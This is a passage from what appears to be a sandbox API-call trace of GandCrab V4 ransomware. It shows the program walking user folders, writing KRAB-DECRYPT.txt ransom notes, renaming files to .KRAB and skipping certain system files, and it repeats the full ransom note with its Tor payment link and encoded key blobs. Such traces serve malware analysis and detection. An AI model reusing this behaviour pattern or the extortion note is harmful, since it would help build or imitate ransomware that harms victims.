HuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.846] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.846] CloseHandle (hObject=0x320) returned 1 [0100.847] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.847] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.847] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x2c)) [0100.847] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.848] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.848] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.848] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Recent\\d2ca4a08d2ca4dee3d.lock") returned 47 [0100.848] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\recent\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.849] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.849] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.850] lstrlenW (lpString="C:\\Users\\Default\\Recent\\") returned 24 [0100.850] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Recent\\*") returned="C:\\Users\\Default\\Recent\\*" [0100.850] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.850] CloseHandle (hObject=0x320) returned 1 [0100.850] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.850] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0100.850] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0100.850] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0100.850] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0100.850] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.851] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.851] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.851] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.851] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.851] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.851] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.852] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Saved Games\\\\KRAB-DECRYPT.txt") returned 46 [0100.852] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\saved games\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.853] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.853] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.854] CloseHandle (hObject=0x320) returned 1 [0100.854] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.855] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.855] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x3c)) [0100.855] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.856] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.856] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.856] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Saved Games\\d2ca4a08d2ca4dee3d.lock") returned 52 [0100.856] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\saved games\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.857] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.858] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.861] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\") returned 29 [0100.861] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*") returned="C:\\Users\\Default\\Saved Games\\*" [0100.861] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdfe0 [0100.861] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.861] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.861] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.861] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.861] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.861] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.861] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.861] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Saved Games\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Saved Games\\d2ca4a08d2ca4dee3d.lock" [0100.861] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.862] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Saved Games\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 57 [0100.862] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\d2ca4a08d2ca4dee3d.lock") returned 52 [0100.862] lstrlenW (lpString=".lock") returned 5 [0100.862] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.863] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.863] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.863] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.863] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.863] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.863] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.863] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Saved Games\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Saved Games\\KRAB-DECRYPT.txt" [0100.863] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.864] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Saved Games\\KRAB-DECRYPT.txt.KRAB") returned 50 [0100.864] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\KRAB-DECRYPT.txt") returned 45 [0100.864] lstrlenW (lpString=".txt") returned 4 [0100.864] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.864] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.864] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.864] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\KRAB-DECRYPT.txt") returned 45 [0100.865] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\KRAB-DECRYPT.txt") returned 45 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.865] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.865] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.865] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.865] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0100.865] CloseHandle (hObject=0x320) returned 1 [0100.866] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.866] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0100.866] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0100.866] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0100.866] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\" [0100.866] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.866] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.867] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.867] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\SendTo\\\\KRAB-DECRYPT.txt") returned 41 [0100.867] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\sendto\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.881] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP